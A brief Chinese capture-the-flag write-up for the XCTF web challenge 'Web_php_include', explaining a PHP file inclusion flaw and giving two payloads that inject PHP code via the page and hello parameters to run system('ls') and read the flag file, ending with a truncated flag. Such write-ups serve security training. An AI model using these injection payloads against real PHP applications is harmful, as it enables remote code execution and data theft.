攻防世界web進階區之Web_php_include

代碼審計後我們會發現存在文件包含漏洞。 藉助hello參數構建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>然後藉助參數?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flag ctf{876a5fca
相關文章
相關標籤/搜索